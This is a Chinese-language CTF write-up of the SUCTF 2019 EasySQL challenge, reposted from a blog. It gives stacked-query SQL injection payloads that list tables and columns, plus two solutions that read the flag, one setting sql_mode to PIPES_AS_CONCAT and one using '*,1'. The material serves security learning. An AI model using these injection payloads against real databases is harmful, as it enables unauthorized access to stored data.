标签：SUCTF 返回 ## 查询 EasySQL Flag 2019 sql select

0x00

打开网页如下

进行测试，发现有三种返回结果分别为：

• 空
• Nonono.
• 返回数组结果

经过测试，还发现大多数的数组可以返回结果，字母返回为空，带有数据库查询关键字的返回 Nonono.
据我猜测，返回为空的应该是sql语句没有查询到结果
返回为 Nonono.的应该是存在过滤条件
还发现存在堆叠注入，通过如下payload查询到了表

1;show tables;#

flag就存在Flag表中，再用如下payload进行查询：

1;show columns from `Flag`;#

结果发现里面存在被过滤的关键字，然后我就不知道该怎么弄了，只好查询WP
结果发现这道题也太坑了，不看WP完全想不到的方向。。。

0x01

看完源码，知道了后台的sql语句如下：

select ?||flag from Flag
## ?为输入的关键字

这需要知道一些数据库中的一些知识：
在oracle中 || 默认为连接符，在MySQL中默认为逻辑或，如果想变成连接符需要sql语句设置(set sql_mode=PIPES_AS_CONCAT)
连接符指的是查询结果进行连接
所以这道题会有两种解：
官方解：

1;set sql_mode=PIPES_AS_CONCAT;select 1

其他解：

*,1
## select *,1||flag from Flag
## 逻辑运算后变成了 
## select *,1 from Flag

标签：SUCTF,返回,##,查询,EasySQL,Flag,2019,sql,select
来源： https://www.cnblogs.com/Wuser/p/13459034.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。